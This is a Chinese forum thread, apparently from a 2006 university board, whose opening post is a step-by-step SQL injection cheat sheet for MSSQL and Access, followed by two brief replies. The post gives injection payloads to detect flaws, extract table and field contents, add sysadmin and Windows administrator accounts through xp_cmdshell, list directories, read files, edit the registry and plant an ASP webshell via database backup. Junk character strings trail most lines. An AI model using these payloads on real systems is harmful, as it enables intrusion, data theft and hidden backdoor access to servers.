社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 5194阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 ]N,'3`&::  
  2.初步判断是否是mssql ;and user>0 k.})3~F-  
7Le- f  
  3.注入参数是字符'and [查询条件] and ''=' P8#_E{f  
nVrV6w  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' PbY.8d%2/k  
$2Awp@j  
  5.判断数据库系统 8#R%jjr%T  
G({5LjgW  
  ;and (select count(*) from sysobjects)>0 mssql QkWEVL@uM  
fT{jD_Q+3  
  ;and (select count(*) from msysobjects)>0 access  ^Y!$WP  
H]*B5Jv~  
oGyoU#z#  
}8ESp3~e_  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 _+)n}Se  
mKE' l'9A_  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 oKr= ]p  
z8r?C  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 @My RcC  
&xvNR=K[`  
  9.(1)猜字段的ascii值(access) E:O/=cT  
e\O625  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ADM!4L(s4}  
P8H2v_)X&  
  (2)猜字段的ascii值(mssql) SmRFxqtN  
unRFcjEa  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 J7`;l6+Gb  
4uh~@Lv  
  10.测试权限结构(mssql) <IBUl}|\  
*y(UI/c  
dQFUQ  
Pf;RJeD  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- `Ba?4_>k  
)iVuac]E++  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- TwF.UL@G%  
[,;O$j}  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ONZ(0H{ 1$  
~]Av$S  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- _,v>P2)  
9. ,IqnP  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 3g56[;Up?  
KZ1m 2R}'  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- *v: .]_;  
6ZwQ/~7H  
  ;and 1=(select IS_MEMBER('db_owner'));-- nEP3B '+  
_mQj=  
/1m+iM^V  
E(z|LS*3  
  11.添加mssql和系统的帐户 k py)kS  
/!.]Y8yEH  
  ;exec master.dbo.sp_addlogin username;-- GO*D4<#u  
  ;exec master.dbo.sp_password null,username,password;-- In;P33'p  
i5_l//]  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- O;&5> W,Z  
I.>8p]X  
  ;exec master.dbo.xp_cmdshell 'net user username password #s#BYbF  
n 4co s  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- hQz1zG`z7  
=s*4y$%I  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- Q \S Sv;3_  
56u_viZ=8  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ~9,Fc6w4`+  
sHV?njZd  
loHMQKy@  
\4 +HNy3  
  12.(1)遍历目录 `,Y3(=3Xe?  
rmFcSolt,f  
  ;create table dirs(paths varchar(100), id int) 0-uVmlk=/  
\IEuu^  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' |oePB<N  
\@T;/Pj{[  
  ;and (select top 1 paths from dirs)>0 sPl3JP&s  
{qU;>;(  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) h0A%KL  
&" 5Yt&{  
91nB?8ZE6,  
yn20*ix{  
  (2)遍历目录 *y` (^kyS  
kw7E<aF!  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 3<[q>7X  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 }AiF 7N0  
'geN  dx  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 / %F,  
c+O:n:L  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 I]pz3!On4,  
|Ho} D~  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 &' y}L'  
B?e] Ht  
r%>7n,+o  
OHnsfXO_V  
  13.mssql中的存储过程 glkH??S  
7j(gW  
  xp_regenumvalues 注册表根键, 子键 aZ|S$-}  
PCa0I^d  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 K$s{e0 79  
SLH;iqPT  
  xp_regread 根键,子键,键值名 83aWMmA(1  
rd24R-6  
  ;exec xp_regread 8o).q}>&  
<K>qK]|C  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 G_WHW(8   
W@%g_V}C*  
  xp_regwrite 根键,子键, 值名, 值类型, 值 o3NB3@uj<  
 `=B v+  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 u@`y/,PX  
Df]*S  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ?iamo.0zN  
7 <K=G2_:  
  xp_regdeletevalue 根键,子键,值名 9%0^fhrJ  
KFaYn  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 |@f\[v9`  
ICc:k%wE7  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ~EvGNnTL  
9Sa6v?sRor  
xK5~9StP  
6TXTJ]er  
  14.mssql的backup创建webshell 7&w[h4Lw  
n;:C{5  
  use model =rkW325O  
u_8Z^T  
  create table cmd(str image); ^i8(/iwdJE  
}}"|(2I  
  insert into cmd(str) values (''); ZXIz.GFy+  
",Fvv  
  backup database model to disk='c:\l.asp'; Sogt?]HB$  
`_]UlI_h  
jz>b>;  
vfc,{F=Q  
  15.mssql内置函数 'e$8 IZm  
2p58_^l  
  ;and (select @@version)>0 获得Windows的版本号 o!c~"  
'TA !JB+  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa pTncx%!W5  
kjOkPp  
  ;and (select user_name())>0 爆当前系统的连接用户 hDBo XIK  
!-&;t7R  
  ;and (select db_name())>0 得到当前连接的数据库 `}FZ;q3DP  
glBS|b$\:  
R:f ,g2  
m9-=Y{&/  
  16.简洁的webshell kP^=  
O3#eQs  
  use model e5'U[ bQm  
(rq(y$N  
  create table cmd(str image); qG]0z_dPE~  
;0uiO.  
  insert into cmd(str) values (''); 8kE3\#);\  
_?eT[!oO8  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
枫
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录 或 注册
如果您在写长篇帖子又不马上发表,建议存为草稿
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八